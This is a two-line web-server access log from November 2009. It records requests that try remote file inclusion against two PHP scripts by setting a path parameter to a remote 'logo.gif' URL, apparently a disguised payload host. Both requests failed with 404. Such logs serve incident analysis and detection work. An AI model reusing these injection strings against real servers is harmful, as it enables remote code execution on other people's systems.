61.47.7.71 - - [01/Nov/2009:02:53:40 -0500] "GET /logs/access_log.Q109093000%20%20//agendax/addevent.inc.php?agendax_path=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:53:56 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
